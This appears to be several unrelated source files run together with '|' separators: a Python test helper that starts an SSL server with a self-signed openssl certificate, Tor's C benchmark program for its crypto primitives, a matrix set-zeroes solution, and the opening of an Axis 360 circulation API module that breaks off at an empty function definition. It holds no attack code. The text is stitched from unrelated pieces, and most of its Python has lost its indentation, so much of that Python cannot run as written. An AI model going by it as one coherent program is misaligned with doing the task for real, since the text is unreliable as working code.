class SSLServer(Server):
cert_file: NamedTemporaryFile = field(init=False, repr=False)
def __post_init__(self) -> None:
super().__post_init__()
self.cert_file = NamedTemporaryFile()
self._gen_cert(self.cert_file.name)
def _gen_cert(self, path: Path) -> None:
subprocess.run(
f"openssl req -new -x509 -days 365 -nodes -out {path} -keyout {path}"
+ " -subj '/C=AU/ST=VIC/O=ACME/CN=example.com'",
shell=True,
check=True,
capture_output=True,
)
logger.info("Generated x509 key/cert", path=path)
async def start(self) -> None:
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ssl_context.load_cert_chain(self.cert_file.name)
return await super().start(ssl_context)
async def stop(self) -> None:
self.cert_file.close()
await super().stop()
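# A minimal usage sketch (an illustrative addition, not part of the original
# test helpers): how the Server above is intended to be driven from asyncio,
# for example inside a pytest fixture. Construct it, start it on an ephemeral
# localhost port, then stop it.
async def _demo_server_lifecycle() -> None:
    server = Server()
    await server.start()
    logger.info("Demo server listening", port=server.port)
    await server.stop()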
|
/* Copyright (c) 2001-2004, Roger Dingledine.
* Copyright (c) 2004-2006, Roger Dingledine, Nick Mathewson.
* Copyright (c) 2007-2019, The Tor Project, Inc. */
/* See LICENSE for licensing information */
/**
* \file bench.c
* \brief Benchmarks for lower level Tor modules.
**/
#include "orconfig.h"
#include "core/or/or.h"
#include "core/crypto/onion_tap.h"
#include "core/crypto/relay_crypto.h"
#include "lib/intmath/weakrng.h"
#ifdef ENABLE_OPENSSL
#include <openssl/opensslv.h>
#include <openssl/evp.h>
#include <openssl/ec.h>
#include <openssl/ecdh.h>
#include <openssl/obj_mac.h>
#endif
#include "core/or/circuitlist.h"
#include "app/config/config.h"
#include "app/main/subsysmgr.h"
#include "lib/crypt_ops/crypto_curve25519.h"
#include "lib/crypt_ops/crypto_dh.h"
#include "core/crypto/onion_ntor.h"
#include "lib/crypt_ops/crypto_ed25519.h"
#include "lib/crypt_ops/crypto_rand.h"
#include "feature/dircommon/consdiff.h"
#include "lib/compress/compress.h"
#include "core/or/cell_st.h"
#include "core/or/or_circuit_st.h"
#include "lib/crypt_ops/digestset.h"
#include "lib/crypt_ops/crypto_init.h"
#include "feature/dirparse/microdesc_parse.h"
#include "feature/nodelist/microdesc.h"
#if defined(HAVE_CLOCK_GETTIME) && defined(CLOCK_PROCESS_CPUTIME_ID)
static uint64_t nanostart;
static inline uint64_t
timespec_to_nsec(const struct timespec *ts)
{
return ((uint64_t)ts->tv_sec)*1000000000 + ts->tv_nsec;
}
static void
reset_perftime(void)
{
struct timespec ts;
int r;
r = clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &ts);
tor_assert(r == 0);
nanostart = timespec_to_nsec(&ts);
}
static uint64_t
perftime(void)
{
struct timespec ts;
int r;
r = clock_gettime(CLOCK_PROCESS_CPUTIME_ID, &ts);
tor_assert(r == 0);
return timespec_to_nsec(&ts) - nanostart;
}
#else /* !(defined(HAVE_CLOCK_GETTIME) && defined(CLOCK_PROCESS_CPUTIME_ID)) */
static struct timeval tv_start = { 0, 0 };
static void
reset_perftime(void)
{
tor_gettimeofday(&tv_start);
}
static uint64_t
perftime(void)
{
struct timeval now, out;
tor_gettimeofday(&now);
timersub(&now, &tv_start, &out);
return ((uint64_t)out.tv_sec)*1000000000 + out.tv_usec*1000;
}
#endif /* defined(HAVE_CLOCK_GETTIME) && defined(CLOCK_PROCESS_CPUTIME_ID) */
#define NANOCOUNT(start,end,iters) \
( ((double)((end)-(start))) / (iters) )
#define MICROCOUNT(start,end,iters) \
( NANOCOUNT((start), (end), (iters)) / 1000.0 )
/** Run AES performance benchmarks. */
static void
bench_aes(void)
{
int len, i;
char *b1, *b2;
crypto_cipher_t *c;
uint64_t start, end;
const int bytes_per_iter = (1<<24);
reset_perftime();
char key[CIPHER_KEY_LEN];
crypto_rand(key, sizeof(key));
c = crypto_cipher_new(key);
for (len = 1; len <= 8192; len *= 2) {
int iters = bytes_per_iter / len;
b1 = tor_malloc_zero(len);
b2 = tor_malloc_zero(len);
start = perftime();
for (i = 0; i < iters; ++i) {
crypto_cipher_encrypt(c, b1, b2, len);
}
end = perftime();
tor_free(b1);
tor_free(b2);
printf("%d bytes: %.2f nsec per byte\n", len,
NANOCOUNT(start, end, iters*len));
}
crypto_cipher_free(c);
}
static void
bench_onion_TAP(void)
{
const int iters = 1<<9;
int i;
crypto_pk_t *key, *key2;
uint64_t start, end;
char os[TAP_ONIONSKIN_CHALLENGE_LEN];
char or[TAP_ONIONSKIN_REPLY_LEN];
crypto_dh_t *dh_out = NULL;
key = crypto_pk_new();
key2 = crypto_pk_new();
if (crypto_pk_generate_key_with_bits(key, 1024) < 0)
goto done;
if (crypto_pk_generate_key_with_bits(key2, 1024) < 0)
goto done;
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
onion_skin_TAP_create(key, &dh_out, os);
crypto_dh_free(dh_out);
}
end = perftime();
printf("Client-side, part 1: %f usec.\n", NANOCOUNT(start, end, iters)/1e3);
onion_skin_TAP_create(key, &dh_out, os);
start = perftime();
for (i = 0; i < iters; ++i) {
char key_out[CPATH_KEY_MATERIAL_LEN];
onion_skin_TAP_server_handshake(os, key, NULL, or,
key_out, sizeof(key_out));
}
end = perftime();
printf("Server-side, key guessed right: %f usec\n",
NANOCOUNT(start, end, iters)/1e3);
start = perftime();
for (i = 0; i < iters; ++i) {
char key_out[CPATH_KEY_MATERIAL_LEN];
onion_skin_TAP_server_handshake(os, key2, key, or,
key_out, sizeof(key_out));
}
end = perftime();
printf("Server-side, key guessed wrong: %f usec.\n",
NANOCOUNT(start, end, iters)/1e3);
start = perftime();
for (i = 0; i < iters; ++i) {
crypto_dh_t *dh;
char key_out[CPATH_KEY_MATERIAL_LEN];
int s;
dh = crypto_dh_dup(dh_out);
s = onion_skin_TAP_client_handshake(dh, or, key_out, sizeof(key_out),
NULL);
crypto_dh_free(dh);
tor_assert(s == 0);
}
end = perftime();
printf("Client-side, part 2: %f usec.\n",
NANOCOUNT(start, end, iters)/1e3);
done:
crypto_dh_free(dh_out);
crypto_pk_free(key);
crypto_pk_free(key2);
}
static void
bench_onion_ntor_impl(void)
{
const int iters = 1<<10;
int i;
curve25519_keypair_t keypair1, keypair2;
uint64_t start, end;
uint8_t os[NTOR_ONIONSKIN_LEN];
uint8_t or[NTOR_REPLY_LEN];
ntor_handshake_state_t *state = NULL;
uint8_t nodeid[DIGEST_LEN];
di_digest256_map_t *keymap = NULL;
curve25519_secret_key_generate(&keypair1.seckey, 0);
curve25519_public_key_generate(&keypair1.pubkey, &keypair1.seckey);
curve25519_secret_key_generate(&keypair2.seckey, 0);
curve25519_public_key_generate(&keypair2.pubkey, &keypair2.seckey);
dimap_add_entry(&keymap, keypair1.pubkey.public_key, &keypair1);
dimap_add_entry(&keymap, keypair2.pubkey.public_key, &keypair2);
crypto_rand((char *)nodeid, sizeof(nodeid));
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
onion_skin_ntor_create(nodeid, &keypair1.pubkey, &state, os);
ntor_handshake_state_free(state);
state = NULL;
}
end = perftime();
printf("Client-side, part 1: %f usec.\n", NANOCOUNT(start, end, iters)/1e3);
state = NULL;
onion_skin_ntor_create(nodeid, &keypair1.pubkey, &state, os);
start = perftime();
for (i = 0; i < iters; ++i) {
uint8_t key_out[CPATH_KEY_MATERIAL_LEN];
onion_skin_ntor_server_handshake(os, keymap, NULL, nodeid, or,
key_out, sizeof(key_out));
}
end = perftime();
printf("Server-side: %f usec\n",
NANOCOUNT(start, end, iters)/1e3);
start = perftime();
for (i = 0; i < iters; ++i) {
uint8_t key_out[CPATH_KEY_MATERIAL_LEN];
int s;
s = onion_skin_ntor_client_handshake(state, or, key_out, sizeof(key_out),
NULL);
tor_assert(s == 0);
}
end = perftime();
printf("Client-side, part 2: %f usec.\n",
NANOCOUNT(start, end, iters)/1e3);
ntor_handshake_state_free(state);
dimap_free(keymap, NULL);
}
static void
bench_onion_ntor(void)
{
int ed;
for (ed = 0; ed <= 1; ++ed) {
printf("Ed25519-based basepoint multiply = %s.\n",
(ed == 0) ? "disabled" : "enabled");
curve25519_set_impl_params(ed);
bench_onion_ntor_impl();
}
}
static void
bench_ed25519_impl(void)
{
uint64_t start, end;
const int iters = 1<<12;
int i;
const uint8_t msg[] = "but leaving, could not tell what they had heard";
ed25519_signature_t sig;
ed25519_keypair_t kp;
curve25519_keypair_t curve_kp;
ed25519_public_key_t pubkey_tmp;
ed25519_secret_key_generate(&kp.seckey, 0);
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_public_key_generate(&kp.pubkey, &kp.seckey);
}
end = perftime();
printf("Generate public key: %.2f usec\n",
MICROCOUNT(start, end, iters));
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_sign(&sig, msg, sizeof(msg), &kp);
}
end = perftime();
printf("Sign a short message: %.2f usec\n",
MICROCOUNT(start, end, iters));
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_checksig(&sig, msg, sizeof(msg), &kp.pubkey);
}
end = perftime();
printf("Verify signature: %.2f usec\n",
MICROCOUNT(start, end, iters));
curve25519_keypair_generate(&curve_kp, 0);
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_public_key_from_curve25519_public_key(&pubkey_tmp,
&curve_kp.pubkey, 1);
}
end = perftime();
printf("Convert public point from curve25519: %.2f usec\n",
MICROCOUNT(start, end, iters));
curve25519_keypair_generate(&curve_kp, 0);
start = perftime();
for (i = 0; i < iters; ++i) {
ed25519_public_blind(&pubkey_tmp, &kp.pubkey, msg);
}
end = perftime();
printf("Blind a public key: %.2f usec\n",
MICROCOUNT(start, end, iters));
}
static void
bench_ed25519(void)
{
int donna;
for (donna = 0; donna <= 1; ++donna) {
printf("Ed25519-donna = %s.\n",
(donna == 0) ? "disabled" : "enabled");
ed25519_set_impl_params(donna);
bench_ed25519_impl();
}
}
static void
bench_rand_len(int len)
{
const int N = 100000;
int i;
char *buf = tor_malloc(len);
uint64_t start,end;
start = perftime();
for (i = 0; i < N; ++i) {
crypto_rand(buf, len);
}
end = perftime();
printf("crypto_rand(%d): %f nsec.\n", len, NANOCOUNT(start,end,N));
crypto_fast_rng_t *fr = crypto_fast_rng_new();
start = perftime();
for (i = 0; i < N; ++i) {
crypto_fast_rng_getbytes(fr,(uint8_t*)buf,len);
}
end = perftime();
printf("crypto_fast_rng_getbytes(%d): %f nsec.\n", len,
NANOCOUNT(start,end,N));
crypto_fast_rng_free(fr);
if (len <= 32) {
start = perftime();
for (i = 0; i < N; ++i) {
crypto_strongest_rand((uint8_t*)buf, len);
}
end = perftime();
printf("crypto_strongest_rand(%d): %f nsec.\n", len,
NANOCOUNT(start,end,N));
}
if (len == 4) {
tor_weak_rng_t weak;
tor_init_weak_random(&weak, 1337);
start = perftime();
uint32_t t=0;
for (i = 0; i < N; ++i) {
t += tor_weak_random(&weak);
}
end = perftime();
printf("weak_rand(4): %f nsec.\n", NANOCOUNT(start,end,N));
}
tor_free(buf);
}
static void
bench_rand(void)
{
bench_rand_len(4);
bench_rand_len(16);
bench_rand_len(128);
}
static void
bench_cell_aes(void)
{
uint64_t start, end;
const int len = 509;
const int iters = (1<<16);
const int max_misalign = 15;
char *b = tor_malloc(len+max_misalign);
crypto_cipher_t *c;
int i, misalign;
char key[CIPHER_KEY_LEN];
crypto_rand(key, sizeof(key));
c = crypto_cipher_new(key);
reset_perftime();
for (misalign = 0; misalign <= max_misalign; ++misalign) {
start = perftime();
for (i = 0; i < iters; ++i) {
crypto_cipher_crypt_inplace(c, b+misalign, len);
}
end = perftime();
printf("%d bytes, misaligned by %d: %.2f nsec per byte\n", len, misalign,
NANOCOUNT(start, end, iters*len));
}
crypto_cipher_free(c);
tor_free(b);
}
/** Run digestmap_t performance benchmarks. */
static void
bench_dmap(void)
{
smartlist_t *sl = smartlist_new();
smartlist_t *sl2 = smartlist_new();
uint64_t start, end, pt2, pt3, pt4;
int iters = 8192;
const int elts = 4000;
const int fpostests = 100000;
char d[20];
int i,n=0, fp = 0;
digestmap_t *dm = digestmap_new();
digestset_t *ds = digestset_new(elts);
for (i = 0; i < elts; ++i) {
crypto_rand(d, 20);
smartlist_add(sl, tor_memdup(d, 20));
}
for (i = 0; i < elts; ++i) {
crypto_rand(d, 20);
smartlist_add(sl2, tor_memdup(d, 20));
}
//printf("nbits=%d\n", ds->mask+1);
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
SMARTLIST_FOREACH(sl, const char *, cp, digestmap_set(dm, cp, (void*)1));
}
pt2 = perftime();
printf("digestmap_set: %.2f ns per element\n",
NANOCOUNT(start, pt2, iters*elts));
for (i = 0; i < iters; ++i) {
SMARTLIST_FOREACH(sl, const char *, cp, digestmap_get(dm, cp));
SMARTLIST_FOREACH(sl2, const char *, cp, digestmap_get(dm, cp));
}
pt3 = perftime();
printf("digestmap_get: %.2f ns per element\n",
NANOCOUNT(pt2, pt3, iters*elts*2));
for (i = 0; i < iters; ++i) {
SMARTLIST_FOREACH(sl, const char *, cp, digestset_add(ds, cp));
}
pt4 = perftime();
printf("digestset_add: %.2f ns per element\n",
NANOCOUNT(pt3, pt4, iters*elts));
for (i = 0; i < iters; ++i) {
SMARTLIST_FOREACH(sl, const char *, cp,
n += digestset_probably_contains(ds, cp));
SMARTLIST_FOREACH(sl2, const char *, cp,
n += digestset_probably_contains(ds, cp));
}
end = perftime();
printf("digestset_probably_contains: %.2f ns per element.\n",
NANOCOUNT(pt4, end, iters*elts*2));
/* We need to use this, or else the whole loop gets optimized out. */
printf("Hits == %d\n", n);
for (i = 0; i < fpostests; ++i) {
crypto_rand(d, 20);
if (digestset_probably_contains(ds, d)) ++fp;
}
printf("False positive rate on digestset: %.2f%%\n",
(fp/(double)fpostests)*100);
digestmap_free(dm, NULL);
digestset_free(ds);
SMARTLIST_FOREACH(sl, char *, cp, tor_free(cp));
SMARTLIST_FOREACH(sl2, char *, cp, tor_free(cp));
smartlist_free(sl);
smartlist_free(sl2);
}
static void
bench_siphash(void)
{
char buf[128];
int lens[] = { 7, 8, 15, 16, 20, 32, 111, 128, -1 };
int i, j;
uint64_t start, end;
const int N = 300000;
crypto_rand(buf, sizeof(buf));
for (i = 0; lens[i] > 0; ++i) {
reset_perftime();
start = perftime();
for (j = 0; j < N; ++j) {
siphash24g(buf, lens[i]);
}
end = perftime();
printf("siphash24g(%d): %.2f ns per call\n",
lens[i], NANOCOUNT(start,end,N));
}
}
static void
bench_digest(void)
{
char buf[8192];
char out[DIGEST512_LEN];
const int lens[] = { 1, 16, 32, 64, 128, 512, 1024, 2048, -1 };
const int N = 300000;
uint64_t start, end;
crypto_rand(buf, sizeof(buf));
for (int alg = 0; alg < N_DIGEST_ALGORITHMS; alg++) {
for (int i = 0; lens[i] > 0; ++i) {
reset_perftime();
start = perftime();
int failures = 0;
for (int j = 0; j < N; ++j) {
switch (alg) {
case DIGEST_SHA1:
failures += crypto_digest(out, buf, lens[i]) < 0;
break;
case DIGEST_SHA256:
case DIGEST_SHA3_256:
failures += crypto_digest256(out, buf, lens[i], alg) < 0;
break;
case DIGEST_SHA512:
case DIGEST_SHA3_512:
failures += crypto_digest512(out, buf, lens[i], alg) < 0;
break;
default:
tor_assert(0);
}
}
end = perftime();
printf("%s(%d): %.2f ns per call\n",
crypto_digest_algorithm_get_name(alg),
lens[i], NANOCOUNT(start,end,N));
if (failures)
printf("ERROR: crypto_digest failed %d times.\n", failures);
}
}
}
static void
bench_cell_ops(void)
{
const int iters = 1<<16;
int i;
/* benchmarks for cell ops at relay. */
or_circuit_t *or_circ = tor_malloc_zero(sizeof(or_circuit_t));
cell_t *cell = tor_malloc(sizeof(cell_t));
int outbound;
uint64_t start, end;
crypto_rand((char*)cell->payload, sizeof(cell->payload));
/* Mock-up or_circuit_t */
or_circ->base_.magic = OR_CIRCUIT_MAGIC;
or_circ->base_.purpose = CIRCUIT_PURPOSE_OR;
/* Initialize crypto */
char key1[CIPHER_KEY_LEN], key2[CIPHER_KEY_LEN];
crypto_rand(key1, sizeof(key1));
crypto_rand(key2, sizeof(key2));
or_circ->crypto.f_crypto = crypto_cipher_new(key1);
or_circ->crypto.b_crypto = crypto_cipher_new(key2);
or_circ->crypto.f_digest = crypto_digest_new();
or_circ->crypto.b_digest = crypto_digest_new();
reset_perftime();
for (outbound = 0; outbound <= 1; ++outbound) {
cell_direction_t d = outbound ? CELL_DIRECTION_OUT : CELL_DIRECTION_IN;
start = perftime();
for (i = 0; i < iters; ++i) {
char recognized = 0;
crypt_path_t *layer_hint = NULL;
relay_decrypt_cell(TO_CIRCUIT(or_circ), cell, d,
&layer_hint, &recognized);
}
end = perftime();
printf("%sbound cells: %.2f ns per cell. (%.2f ns per byte of payload)\n",
outbound?"Out":" In",
NANOCOUNT(start,end,iters),
NANOCOUNT(start,end,iters*CELL_PAYLOAD_SIZE));
}
relay_crypto_clear(&or_circ->crypto);
tor_free(or_circ);
tor_free(cell);
}
static void
bench_dh(void)
{
const int iters = 1<<10;
int i;
uint64_t start, end;
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
char dh_pubkey_a[DH1024_KEY_LEN], dh_pubkey_b[DH1024_KEY_LEN];
char secret_a[DH1024_KEY_LEN], secret_b[DH1024_KEY_LEN];
ssize_t slen_a, slen_b;
crypto_dh_t *dh_a = crypto_dh_new(DH_TYPE_TLS);
crypto_dh_t *dh_b = crypto_dh_new(DH_TYPE_TLS);
crypto_dh_generate_public(dh_a);
crypto_dh_generate_public(dh_b);
crypto_dh_get_public(dh_a, dh_pubkey_a, sizeof(dh_pubkey_a));
crypto_dh_get_public(dh_b, dh_pubkey_b, sizeof(dh_pubkey_b));
slen_a = crypto_dh_compute_secret(LOG_NOTICE,
dh_a, dh_pubkey_b, sizeof(dh_pubkey_b),
secret_a, sizeof(secret_a));
slen_b = crypto_dh_compute_secret(LOG_NOTICE,
dh_b, dh_pubkey_a, sizeof(dh_pubkey_a),
secret_b, sizeof(secret_b));
tor_assert(slen_a == slen_b);
tor_assert(fast_memeq(secret_a, secret_b, slen_a));
crypto_dh_free(dh_a);
crypto_dh_free(dh_b);
}
end = perftime();
printf("Complete DH handshakes (1024 bit, public and private ops):\n"
" %f millisec each.\n", NANOCOUNT(start, end, iters)/1e6);
}
#ifdef ENABLE_OPENSSL
static void
bench_ecdh_impl(int nid, const char *name)
{
const int iters = 1<<10;
int i;
uint64_t start, end;
reset_perftime();
start = perftime();
for (i = 0; i < iters; ++i) {
char secret_a[DH1024_KEY_LEN], secret_b[DH1024_KEY_LEN];
ssize_t slen_a, slen_b;
EC_KEY *dh_a = EC_KEY_new_by_curve_name(nid);
EC_KEY *dh_b = EC_KEY_new_by_curve_name(nid);
if (!dh_a || !dh_b) {
puts("Skipping. (No implementation?)");
return;
}
EC_KEY_generate_key(dh_a);
EC_KEY_generate_key(dh_b);
slen_a = ECDH_compute_key(secret_a, DH1024_KEY_LEN,
EC_KEY_get0_public_key(dh_b), dh_a,
NULL);
slen_b = ECDH_compute_key(secret_b, DH1024_KEY_LEN,
EC_KEY_get0_public_key(dh_a), dh_b,
NULL);
tor_assert(slen_a == slen_b);
tor_assert(fast_memeq(secret_a, secret_b, slen_a));
EC_KEY_free(dh_a);
EC_KEY_free(dh_b);
}
end = perftime();
printf("Complete ECDH %s handshakes (2 public and 2 private ops):\n"
" %f millisec each.\n", name, NANOCOUNT(start, end, iters)/1e6);
}
static void
bench_ecdh_p256(void)
{
bench_ecdh_impl(NID_X9_62_prime256v1, "P-256");
}
static void
bench_ecdh_p224(void)
{
bench_ecdh_impl(NID_secp224r1, "P-224");
}
#endif
static void
bench_md_parse(void)
{
uint64_t start, end;
const int N = 100000;
// selected arbitrarily
const char md_text[] =
"@last-listed 2018-12-14 18:14:14\n"
"onion-key\n"
"-----BEGIN RSA PUBLIC KEY-----\n"
"MIGJAoGBAMHkZeXNDX/49JqM2BVLmh1Fnb5iMVnatvZZTLJyedqDLkbXZ1WKP5oh\n"
"7ec14dj/k3ntpwHD4s2o3Lb6nfagWbug4+F/rNJ7JuFru/PSyOvDyHGNAuegOXph\n"
"3gTGjdDpv/yPoiadGebbVe8E7n6hO+XxM2W/4dqheKimF0/s9B7HAgMBAAE=\n"
"-----END RSA PUBLIC KEY-----\n"
"ntor-onion-key QgF/EjqlNG1wRHLIop/nCekEH+ETGZSgYOhu26eiTF4=\n"
"family $00E9A86E7733240E60D8435A7BBD634A23894098 "
"$329BD7545DEEEBBDC8C4285F243916F248972102 "
"$69E06EBB2573A4F89330BDF8BC869794A3E10E4D "
"$DCA2A3FAE50B3729DAA15BC95FB21AF03389818B\n"
"p accept 53,80,443,5222-5223,25565\n"
"id ed25519 BzffzY99z6Q8KltcFlUTLWjNTBU7yKK+uQhyi1Ivb3A\n";
reset_perftime();
start = perftime();
for (int i = 0; i < N; ++i) {
smartlist_t *s = microdescs_parse_from_string(md_text, NULL, 1,
SAVED_IN_CACHE, NULL);
SMARTLIST_FOREACH(s, microdesc_t *, md, microdesc_free(md));
smartlist_free(s);
}
end = perftime();
printf("Microdesc parse: %f nsec\n", NANOCOUNT(start, end, N));
}
typedef void (*bench_fn)(void);
typedef struct benchmark_t {
const char *name;
bench_fn fn;
int enabled;
} benchmark_t;
#define ENT(s) { #s , bench_##s, 0 }
static struct benchmark_t benchmarks[] = {
ENT(dmap),
ENT(siphash),
ENT(digest),
ENT(aes),
ENT(onion_TAP),
ENT(onion_ntor),
ENT(ed25519),
ENT(rand),
ENT(cell_aes),
ENT(cell_ops),
ENT(dh),
#ifdef ENABLE_OPENSSL
ENT(ecdh_p256),
ENT(ecdh_p224),
#endif
ENT(md_parse),
{NULL,NULL,0}
};
static benchmark_t *
find_benchmark(const char *name)
{
benchmark_t *b;
for (b = benchmarks; b->name; ++b) {
if (!strcmp(name, b->name)) {
return b;
}
}
return NULL;
}
/** Main entry point for benchmark code: parse the command line, and run
* some benchmarks. */
int
main(int argc, const char **argv)
{
int i;
int list=0, n_enabled=0;
char *errmsg;
or_options_t *options;
subsystems_init_upto(SUBSYS_LEVEL_LIBS);
flush_log_messages_from_startup();
tor_compress_init();
if (argc == 4 && !strcmp(argv[1], "diff")) {
const int N = 200;
char *f1 = read_file_to_str(argv[2], RFTS_BIN, NULL);
char *f2 = read_file_to_str(argv[3], RFTS_BIN, NULL);
if (! f1 || ! f2) {
perror("X");
return 1;
}
size_t f1len = strlen(f1);
size_t f2len = strlen(f2);
for (i = 0; i < N; ++i) {
char *diff = consensus_diff_generate(f1, f1len, f2, f2len);
tor_free(diff);
}
char *diff = consensus_diff_generate(f1, f1len, f2, f2len);
printf("%s", diff);
tor_free(f1);
tor_free(f2);
tor_free(diff);
return 0;
}
for (i = 1; i < argc; ++i) {
if (!strcmp(argv[i], "--list")) {
list = 1;
} else {
benchmark_t *benchmark = find_benchmark(argv[i]);
++n_enabled;
if (benchmark) {
benchmark->enabled = 1;
} else {
printf("No such benchmark as %s\n", argv[i]);
}
}
}
reset_perftime();
if (crypto_global_init(0, NULL, NULL) < 0) {
printf("Couldn't seed RNG; exiting.\n");
return 1;
}
init_protocol_warning_severity_level();
options = options_new();
options->command = CMD_RUN_UNITTESTS;
options->DataDirectory = tor_strdup("");
options->KeyDirectory = tor_strdup("");
options->CacheDirectory = tor_strdup("");
options_init(options);
if (set_options(options, &errmsg) < 0) {
printf("Failed to set initial options: %s\n", errmsg);
tor_free(errmsg);
return 1;
}
for (benchmark_t *b = benchmarks; b->name; ++b) {
if (b->enabled || n_enabled == 0) {
printf("===== %s =====\n", b->name);
if (!list)
b->fn();
}
}
return 0;
}
|
from typing import List
class Solution1:
    def set_zeroes(self, matrix: List[List[int]]) -> None:
        """Zero out every row and column that contains a 0, in place.

        The first row and first column of the matrix are reused as marker
        storage, so only O(1) extra space is needed. Since matrix[0][0]
        cannot mark both the first row and the first column, a separate
        flag (col_0) tracks whether the first column must be zeroed.
        """
        num_rows = len(matrix)
        num_cols = len(matrix[0])
        col_0 = 1
        # First pass: record zeroes by marking the first cell of the
        # affected row and column.
        for i in range(num_rows):
            if matrix[i][0] == 0:
                col_0 = 0
            for j in range(1, num_cols):
                if matrix[i][j] == 0:
                    matrix[i][0] = 0
                    matrix[0][j] = 0
        # Second pass, bottom-up and right-to-left so the markers are read
        # before they are overwritten: apply the recorded zeroes.
        for i in range(num_rows - 1, -1, -1):
            for j in range(num_cols - 1, 0, -1):
                if matrix[i][0] == 0 or matrix[0][j] == 0:
                    matrix[i][j] = 0
            if col_0 == 0:
                matrix[i][0] = 0
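# A brief usage sketch (illustrative addition, not part of the original
# solution): running this module directly zeroes out the middle row and
# column of a small matrix in place.
if __name__ == "__main__":
    grid = [
        [1, 1, 1],
        [1, 0, 1],
        [1, 1, 1],
    ]
    Solution1().set_zeroes(grid)
    print(grid)  # expected: [[1, 0, 1], [0, 0, 0], [1, 0, 1]]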
|
import base64
import json
import logging
import os
import re
from collections import defaultdict
from datetime import datetime, timedelta
from flask_babel import lazy_gettext as _
from lxml import etree
from sqlalchemy.orm import contains_eager
from sqlalchemy.orm.session import Session
from core.analytics import Analytics
from core.config import (
CannotLoadConfiguration,
Configuration,
temp_config,
)
from core.coverage import (
BibliographicCoverageProvider,
CoverageFailure,
)
from core.metadata_layer import (
CirculationData,
ContributorData,
FormatData,
IdentifierData,
LinkData,
Metadata,
ReplacementPolicy,
SubjectData,
)
from core.model import (
CirculationEvent,
Classification,
Collection,
Contributor,
DataSource,
DeliveryMechanism,
Edition,
ExternalIntegration,
get_one,
get_one_or_create,
Hyperlink,
Identifier,
Library,
LicensePool,
LinkRelations,
MediaTypes,
Representation,
Session,
Subject,
)
from core.monitor import (
CollectionMonitor,
IdentifierSweepMonitor,
TimelineMonitor,
)
from core.opds_import import (
MetadataWranglerOPDSLookup
)
from core.testing import DatabaseTest
from core.util import LanguageCodes
from core.util.xmlparser import XMLParser
from core.util.http import (
HTTP,
RemoteIntegrationException,
)
from authenticator import Authenticator
from circulation import (
APIAwareFulfillmentInfo,
LoanInfo,
FulfillmentInfo,
HoldInfo,
BaseCirculationAPI
)
from circulation_exceptions import *
from selftest import (
HasCollectionSelfTests,
SelfTestResult,
)
from web_publication_manifest import (
FindawayManifest,
SpineItem,
)
class Axis360API(Authenticator, BaseCirculationAPI, HasCollectionSelfTests):
NAME = ExternalIntegration.AXIS_360
SET_DELIVERY_MECHANISM_AT = BaseCirculationAPI.BORROW_STEP
SERVICE_NAME = "Axis 360"
PRODUCTION_BASE_URL = "https://axis360api.baker-taylor.com/Services/VendorAPI/"
QA_BASE_URL = "http://axis360apiqa.baker-taylor.com/Services/VendorAPI/"
SERVER_NICKNAMES = {
"production" : PRODUCTION_BASE_URL,
"qa" : QA_BASE_URL,
}
DATE_FORMAT = "%m-%d-%Y %H:%M:%S"
SETTINGS = [
{ "key": ExternalIntegration.USERNAME, "label": _("Username"), "required": True },
{ "key": ExternalIntegration.PASSWORD, "label": _("Password"), "required": True },
{ "key": Collection.EXTERNAL_ACCOUNT_ID_KEY, "label": _("Library ID"), "required": True },
{ "key": ExternalIntegration.URL,
"label": _("Server"),
"default": PRODUCTION_BASE_URL,
"required": True,
"format": "url",
"allowed": SERVER_NICKNAMES.keys(),
},
] + BaseCirculationAPI.SETTINGS
LIBRARY_SETTINGS = BaseCirculationAPI.LIBRARY_SETTINGS + [
BaseCirculationAPI.DEFAULT_LOAN_DURATION_SETTING
]
access_token_endpoint = 'accesstoken'
availability_endpoint = 'availability/v2'
fulfillment_endpoint = 'getfullfillmentInfo/v2'
audiobook_metadata_endpoint = 'getaudiobookmetadata/v2'
log = logging.getLogger("Axis 360 API")
# Create a lookup table between common DeliveryMechanism identifiers
# and Axis 360 format types.
epub = Representation.EPUB_MEDIA_TYPE
pdf = Representation.PDF_MEDIA_TYPE
adobe_drm = DeliveryMechanism.ADOBE_DRM
findaway_drm = DeliveryMechanism.FINDAWAY_DRM
no_drm = DeliveryMechanism.NO_DRM
axisnow_drm = DeliveryMechanism.AXISNOW_DRM
# The name Axis 360 gives to its web interface. We use it as the
# name for the underlying access control system.
AXISNOW = "AxisNow"
delivery_mechanism_to_internal_format = {
(epub, no_drm): 'ePub',
(epub, adobe_drm): 'ePub',
(pdf, no_drm): 'PDF',
(pdf, adobe_drm): 'PDF',
(None, findaway_drm): 'Acoustik',
(None, axisnow_drm): AXISNOW,
}
def __init__(self, _db, collection):
if collection.protocol != ExternalIntegration.AXIS_360:
raise ValueError(
"Collection protocol is %s, but passed into Axis360API!" %
collection.protocol
)
self._db = _db
self.library_id = collection.external_account_id
self.username = collection.external_integration.username
self.password = collection.external_integration.password
# Convert the nickname for a server into an actual URL.
base_url = collection.external_integration.url or self.PRODUCTION_BASE_URL
if base_url in self.SERVER_NICKNAMES:
base_url = self.SERVER_NICKNAMES[base_url]
if not base_url.endswith('/'):
base_url += '/'
self.base_url = base_url
if (not self.library_id or not self.username
or not self.password):
raise CannotLoadConfiguration(
"Axis 360 configuration is incomplete."
)
        # Store the credentials as UTF-8 byte strings rather than unicode strings.
settings = [self.library_id, self.username, self.password]
self.library_id, self.username, self.password = (
setting.encode('utf8') for setting in settings
)
self.token = None
self.collection_id = collection.id
@property
def collection(self):
return Collection.by_id(self._db, id=self.collection_id)
@property
def source(self):
return DataSource.lookup(self._db, DataSource.AXIS_360)
@property
def authorization_headers(self):
authorization = u":".join([self.username, self.password, self.library_id])
authorization = authorization.encode("utf_16_le")
authorization = base64.standard_b64encode(authorization)
return dict(Authorization="Basic " + authorization)
def external_integration(self, _db):
return self.collection.external_integration
def _run_self_tests(self, _db):
result = self.run_test(
"Refreshing bearer token", self.refresh_bearer_token
)
yield result
if not result.success:
# If we can't get a bearer token, there's no point running
# the rest of the tests.
return
def _count_events():
